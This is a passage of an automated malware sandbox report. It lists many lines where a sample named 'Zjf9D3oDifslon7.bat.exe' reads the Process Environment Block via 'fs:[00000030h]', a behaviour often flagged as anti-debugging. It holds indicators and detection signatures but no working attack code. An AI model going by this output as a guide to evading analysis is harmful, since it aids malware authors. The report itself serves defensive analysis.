                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C2349 mov eax, dword ptr fs:[00000030h]5_2_018C2349
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov eax, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov eax, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov eax, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov ecx, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov eax, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C035C mov eax, dword ptr fs:[00000030h]5_2_018C035C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E437C mov eax, dword ptr fs:[00000030h]5_2_018E437C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E284 mov eax, dword ptr fs:[00000030h]5_2_0187E284
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E284 mov eax, dword ptr fs:[00000030h]5_2_0187E284
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C0283 mov eax, dword ptr fs:[00000030h]5_2_018C0283
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C0283 mov eax, dword ptr fs:[00000030h]5_2_018C0283
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C0283 mov eax, dword ptr fs:[00000030h]5_2_018C0283
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018502A0 mov eax, dword ptr fs:[00000030h]5_2_018502A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018502A0 mov eax, dword ptr fs:[00000030h]5_2_018502A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov eax, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov ecx, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov eax, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov eax, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov eax, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D62A0 mov eax, dword ptr fs:[00000030h]5_2_018D62A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A2C3 mov eax, dword ptr fs:[00000030h]5_2_0184A2C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A2C3 mov eax, dword ptr fs:[00000030h]5_2_0184A2C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A2C3 mov eax, dword ptr fs:[00000030h]5_2_0184A2C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A2C3 mov eax, dword ptr fs:[00000030h]5_2_0184A2C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184A2C3 mov eax, dword ptr fs:[00000030h]5_2_0184A2C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018502E1 mov eax, dword ptr fs:[00000030h]5_2_018502E1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018502E1 mov eax, dword ptr fs:[00000030h]5_2_018502E1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018502E1 mov eax, dword ptr fs:[00000030h]5_2_018502E1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183823B mov eax, dword ptr fs:[00000030h]5_2_0183823B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C8243 mov eax, dword ptr fs:[00000030h]5_2_018C8243
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C8243 mov ecx, dword ptr fs:[00000030h]5_2_018C8243
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183A250 mov eax, dword ptr fs:[00000030h]5_2_0183A250
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01846259 mov eax, dword ptr fs:[00000030h]5_2_01846259
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FA250 mov eax, dword ptr fs:[00000030h]5_2_018FA250
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FA250 mov eax, dword ptr fs:[00000030h]5_2_018FA250
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844260 mov eax, dword ptr fs:[00000030h]5_2_01844260
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844260 mov eax, dword ptr fs:[00000030h]5_2_01844260
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844260 mov eax, dword ptr fs:[00000030h]5_2_01844260
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183826B mov eax, dword ptr fs:[00000030h]5_2_0183826B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0274 mov eax, dword ptr fs:[00000030h]5_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01842582 mov eax, dword ptr fs:[00000030h]5_2_01842582
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01842582 mov ecx, dword ptr fs:[00000030h]5_2_01842582
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01874588 mov eax, dword ptr fs:[00000030h]5_2_01874588
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E59C mov eax, dword ptr fs:[00000030h]5_2_0187E59C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C05A7 mov eax, dword ptr fs:[00000030h]5_2_018C05A7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C05A7 mov eax, dword ptr fs:[00000030h]5_2_018C05A7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C05A7 mov eax, dword ptr fs:[00000030h]5_2_018C05A7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018645B1 mov eax, dword ptr fs:[00000030h]5_2_018645B1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018645B1 mov eax, dword ptr fs:[00000030h]5_2_018645B1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E5CF mov eax, dword ptr fs:[00000030h]5_2_0187E5CF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E5CF mov eax, dword ptr fs:[00000030h]5_2_0187E5CF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018465D0 mov eax, dword ptr fs:[00000030h]5_2_018465D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A5D0 mov eax, dword ptr fs:[00000030h]5_2_0187A5D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A5D0 mov eax, dword ptr fs:[00000030h]5_2_0187A5D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E5E7 mov eax, dword ptr fs:[00000030h]5_2_0186E5E7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018425E0 mov eax, dword ptr fs:[00000030h]5_2_018425E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C5ED mov eax, dword ptr fs:[00000030h]5_2_0187C5ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C5ED mov eax, dword ptr fs:[00000030h]5_2_0187C5ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D6500 mov eax, dword ptr fs:[00000030h]5_2_018D6500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01914500 mov eax, dword ptr fs:[00000030h]5_2_01914500
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850535 mov eax, dword ptr fs:[00000030h]5_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E53E mov eax, dword ptr fs:[00000030h]5_2_0186E53E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E53E mov eax, dword ptr fs:[00000030h]5_2_0186E53E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E53E mov eax, dword ptr fs:[00000030h]5_2_0186E53E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E53E mov eax, dword ptr fs:[00000030h]5_2_0186E53E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186E53E mov eax, dword ptr fs:[00000030h]5_2_0186E53E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848550 mov eax, dword ptr fs:[00000030h]5_2_01848550
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848550 mov eax, dword ptr fs:[00000030h]5_2_01848550
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187656A mov eax, dword ptr fs:[00000030h]5_2_0187656A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187656A mov eax, dword ptr fs:[00000030h]5_2_0187656A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187656A mov eax, dword ptr fs:[00000030h]5_2_0187656A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FA49A mov eax, dword ptr fs:[00000030h]5_2_018FA49A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018464AB mov eax, dword ptr fs:[00000030h]5_2_018464AB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018744B0 mov ecx, dword ptr fs:[00000030h]5_2_018744B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CA4B0 mov eax, dword ptr fs:[00000030h]5_2_018CA4B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018404E5 mov ecx, dword ptr fs:[00000030h]5_2_018404E5
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01878402 mov eax, dword ptr fs:[00000030h]5_2_01878402
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183E420 mov eax, dword ptr fs:[00000030h]5_2_0183E420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183C427 mov eax, dword ptr fs:[00000030h]5_2_0183C427
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C6420 mov eax, dword ptr fs:[00000030h]5_2_018C6420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187A430 mov eax, dword ptr fs:[00000030h]5_2_0187A430
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E443 mov eax, dword ptr fs:[00000030h]5_2_0187E443
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FA456 mov eax, dword ptr fs:[00000030h]5_2_018FA456
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186245A mov eax, dword ptr fs:[00000030h]5_2_0186245A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183645D mov eax, dword ptr fs:[00000030h]5_2_0183645D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CC460 mov ecx, dword ptr fs:[00000030h]5_2_018CC460
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186A470 mov eax, dword ptr fs:[00000030h]5_2_0186A470
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E678E mov eax, dword ptr fs:[00000030h]5_2_018E678E
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018407AF mov eax, dword ptr fs:[00000030h]5_2_018407AF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F47A0 mov eax, dword ptr fs:[00000030h]5_2_018F47A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184C7C0 mov eax, dword ptr fs:[00000030h]5_2_0184C7C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C07C3 mov eax, dword ptr fs:[00000030h]5_2_018C07C3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018627ED mov eax, dword ptr fs:[00000030h]5_2_018627ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE7E1 mov eax, dword ptr fs:[00000030h]5_2_018CE7E1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018447FB mov eax, dword ptr fs:[00000030h]5_2_018447FB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018447FB mov eax, dword ptr fs:[00000030h]5_2_018447FB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C700 mov eax, dword ptr fs:[00000030h]5_2_0187C700
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840710 mov eax, dword ptr fs:[00000030h]5_2_01840710
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870710 mov eax, dword ptr fs:[00000030h]5_2_01870710
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C720 mov eax, dword ptr fs:[00000030h]5_2_0187C720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C720 mov eax, dword ptr fs:[00000030h]5_2_0187C720
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BC730 mov eax, dword ptr fs:[00000030h]5_2_018BC730
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov eax, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov ecx, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187273C mov eax, dword ptr fs:[00000030h]5_2_0187273C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov esi, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov eax, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187674D mov eax, dword ptr fs:[00000030h]5_2_0187674D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CE75D mov eax, dword ptr fs:[00000030h]5_2_018CE75D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840750 mov eax, dword ptr fs:[00000030h]5_2_01840750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882750 mov eax, dword ptr fs:[00000030h]5_2_01882750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882750 mov eax, dword ptr fs:[00000030h]5_2_01882750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4755 mov eax, dword ptr fs:[00000030h]5_2_018C4755
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01848770 mov eax, dword ptr fs:[00000030h]5_2_01848770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850770 mov eax, dword ptr fs:[00000030h]5_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844690 mov eax, dword ptr fs:[00000030h]5_2_01844690
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01844690 mov eax, dword ptr fs:[00000030h]5_2_01844690
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187C6A6 mov eax, dword ptr fs:[00000030h]5_2_0187C6A6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018766B0 mov eax, dword ptr fs:[00000030h]5_2_018766B0
